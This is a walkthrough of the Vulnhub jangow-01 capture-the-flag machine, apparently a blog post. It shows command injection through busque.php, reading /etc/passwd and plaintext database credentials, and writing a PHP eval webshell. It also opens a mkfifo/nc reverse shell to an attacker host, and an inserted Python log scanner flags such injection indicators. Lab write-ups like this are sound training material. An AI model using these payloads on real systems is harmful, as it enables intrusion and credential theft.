Vulnhub jangow-01-1 walkthrough (shell issues)

jangow-01-1.0.1

Identify the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.155.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:48:42:92      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.118  08:00:27:14:f2:28      1      60  PCS Systemtechnik GmbH       

Using Kali Linux's built-in netdiscover tool, the target host's IP address is identified as 192.168.56.118.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.118 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-25 09:42 EST
Nmap scan report for bogon (192.168.56.118)
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:14:F2:28 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.29 seconds

The NMAP scan results show that the target host has 2 open ports: 21 (FTP) and 80 (HTTP).

Get Access

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.

The target host does not allow anonymous access. Move on to the HTTP service on port 80:

Visiting port 80 in a browser redirects automatically to the /site directory. Clicking through a few links on the page (About, Projects, busque), the last one leads to:

http://192.168.56.118/site/busque.php?buscar=

This looks like it could be a local file inclusion vulnerability. Before testing it, first scan for other directories and files:

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ gobuster dir -u http://192.168.56.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.118
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/25 09:52:42 Starting gobuster in directory enumeration mode
===============================================================
/site                 (Status: 301) [Size: 315] [--> http://192.168.56.118/site/]
/server-status        (Status: 403) [Size: 279]
Progress: 217379 / 220561 (98.56%)
===============================================================
2022/11/25 09:53:06 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ gobuster dir -u http://192.168.56.118/site -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.118/site
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/25 09:53:16 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 322] [--> http://192.168.56.118/site/assets/]
/css                  (Status: 301) [Size: 319] [--> http://192.168.56.118/site/css/]
/wordpress            (Status: 301) [Size: 325] [--> http://192.168.56.118/site/wordpress/]
/js                   (Status: 301) [Size: 318] [--> http://192.168.56.118/site/js/]
Progress: 219874 / 220561 (99.69%)
===============================================================
2022/11/25 09:53:41 Finished
===============================================================

There is a wordpress directory under /site. Before scanning it with wpscan, first go back to the /busque link and check whether it has a local file inclusion or command execution vulnerability:

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=../../../../../../etc/passwd

The result shows that the target does not have a file inclusion vulnerability, but it does execute commands, as shown below:

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=whoami      
www-data

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20%20/home/jangow01/user.txt
d41d8cd98f00b204e9800998ecf8427e

This yields the user flag.

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false

Check whether jangow01 has a private key:

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls%20-alh%20/home/jangow01
total 36K
drwxr-xr-x 4 jangow01 desafio02 4.0K Jun 10  2021 .
drwxr-xr-x 3 root     root      4.0K Oct 31  2021 ..
-rw------- 1 jangow01 desafio02  200 Oct 31  2021 .bash_history
-rw-r--r-- 1 jangow01 desafio02  220 Jun 10  2021 .bash_logout
-rw-r--r-- 1 jangow01 desafio02 3.7K Jun 10  2021 .bashrc
drwx------ 2 jangow01 desafio02 4.0K Jun 10  2021 .cache
drwxrwxr-x 2 jangow01 desafio02 4.0K Jun 10  2021 .nano
-rw-r--r-- 1 jangow01 desafio02  655 Jun 10  2021 .profile
-rw-r--r-- 1 jangow01 desafio02    0 Jun 10  2021 .sudo_as_admin_successful
-rw-rw-r-- 1 jangow01 desafio02   33 Jun 10  2021 user.txt

See whether a shell can be obtained through this entry point.

The target host has a filtering mechanism for commands.

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20/var/www/html/.backup
$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

This gives the database username and password. Trying them as the FTP username and password as well works:

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||8205|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Oct 31  2021 html
226 Directory send OK.
ftp> 

Now the key is getting a shell. It seems that running nc, Python and similar commands won't achieve that, so instead use echo to write a shell.php and then visit that shell.php.

192.168.56.118/site/busque.php?buscar=echo '' > jason.php

Verify whether the upload succeeded:

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls                         
assets
busque.php
css
index.html
jason.php
js
shell.php
wordpress


192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]); ?>' > shell.php

http://192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]); ?>' > shell.php

http://192.168.56.118/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%22cmd%22]);%20?%3E%27%20%3E%20shell.php
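As a defender-side example added here (not from the original post), the following Python script scans Apache access-log lines for requests to busque.php and flags buscar values carrying command-injection indicators, covering the whoami and cat probes above as well as the echo-to-shell.php file drop. The log lines, client IP and timestamps are constructed, and the indicator list is my own assumption of what is worth flagging.

```python
"""Flag command-injection attempts against busque.php in Apache access logs."""
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log lines (Apache combined format) modelled on this walkthrough's requests; IP and timestamps are assumptions.
SAMPLE_LOG = """\
192.168.56.206 - - [25/Nov/2022:09:55:01 -0500] "GET /site/busque.php?buscar=projects HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.206 - - [25/Nov/2022:09:56:10 -0500] "GET /site/busque.php?buscar=../../../../../../etc/passwd HTTP/1.1" 200 35 "-" "curl/7.85.0"
192.168.56.206 - - [25/Nov/2022:09:57:32 -0500] "GET /site/busque.php?buscar=whoami HTTP/1.1" 200 44 "-" "curl/7.85.0"
192.168.56.206 - - [25/Nov/2022:09:58:05 -0500] "GET /site/busque.php?buscar=cat%20%20/etc/passwd HTTP/1.1" 200 1800 "-" "curl/7.85.0"
192.168.56.206 - - [25/Nov/2022:10:01:47 -0500] "GET /site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%22cmd%22]);%20?%3E%27%20%3E%20shell.php HTTP/1.1" 200 35 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

# Indicators checked on the percent-decoded value: shell metacharacters, output redirection (file drop), traversal / sensitive paths, PHP tags, common binaries.
INDICATORS = {
    "metachar": re.compile(r"[;|`]|\$\(|&&"),
    "redirect": re.compile(r"\s>+\s*\S"),
    "traversal": re.compile(r"(\.\./){2,}|/etc/passwd"),
    "php_tag": re.compile(r"<\?php", re.I),
    "binary": re.compile(r"\b(whoami|cat|ls|id|nc|mkfifo|python3?|bash|sh)\b"),
}

def get_buscar(query):
    """Decode the buscar= value, splitting only on '&' so a literal ';' in an injected command is not taken as a separator."""
    for pair in query.split("&"):
        key, sep, raw = pair.partition("=")
        if key == "buscar" and sep:
            return unquote_plus(raw)
    return None

def inspect_request(line):
    """Parse one log line; return a finding dict for a busque.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    value = get_buscar(parts.query) if parts.path.endswith("/busque.php") else None
    if value is None:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(value)]
    return {"ip": m.group("ip"), "ts": m.group("ts"), "buscar": value, "hits": hits}

def find_injections(log_text):
    """Return the findings whose decoded buscar value matched at least one indicator."""
    results = (inspect_request(line) for line in log_text.splitlines())
    return [r for r in results if r and r["hits"]]
```

Run `find_injections(SAMPLE_LOG)` against the constructed lines: the benign `buscar=projects` request is left alone, while the four probing requests are returned with the indicators they triggered.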

After a lot of debugging, I ended up using the Linux version of AntSword (蚁剑) to connect to this shell.php.

But this is only a webshell. Trying to get a reverse shell back errored, because the target's nc does not support the -e option.

(www-data:/var/www/html/site) $ echo '<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 443 >/tmp/f");?>' > rev.php
(www-data:/var/www/html/site) $ ls
assets
busque.php
css
index.html
js
shell.php
wordpress
(www-data:/var/www/html/site) $ ls -alh
total 44K
drwxr-xr-x 6 www-data www-data 4.0K Nov 26 08:05 .
drwxr-xr-x 3 root     root     4.0K Oct 31  2021 ..
drwxr-xr-x 3 www-data www-data 4.0K Jun  3  2021 assets
-rw-r--r-- 1 www-data www-data   35 Jun 10  2021 busque.php
drwxr-xr-x 2 www-data www-data 4.0K Jun  3  2021 css
-rw-r--r-- 1 www-data www-data  10K Jun 10  2021 index.html
drwxr-xr-x 2 www-data www-data 4.0K Jun  3  2021 js
-rw-r--r-- 1 www-data www-data   30 Nov 26 08:15 shell.php
drwxr-xr-x 2 www-data www-data 4.0K Jun 10  2021 wordpress
(www-data:/var/www/html/site) $ pwd
/var/www/html/site
(www-data:/var/www/html/site) $ python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.56.206',443));"
ret=2
(www-data:ret=2) $ touch 111.php
/bin/sh: 1: cd: can't cd to ret=2

Unlike the usual scenario, the file cannot be created with echo here; instead, use AntSword's own file manager to create the file and edit its contents.

(www-data:/var/www/html/site) $ ls
111.php
assets
busque.php
css
index.html
js
reverse.php
shell.php
wordpress

Now visit reverse.php in the browser. Note that the callback port can only be 443, because the target has a firewall.

┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ sudo nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.118] 58412
/bin/sh: 0: can't access tty; job control turned off
$ id
whoami
which python
$ which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/var/www/html/site$ 

Finally a proper shell. The next step is to switch to the jangow01 user, but the switch fails; this shell still has problems.

Posted @ 2022-11-26 10:59 by Jason_huawen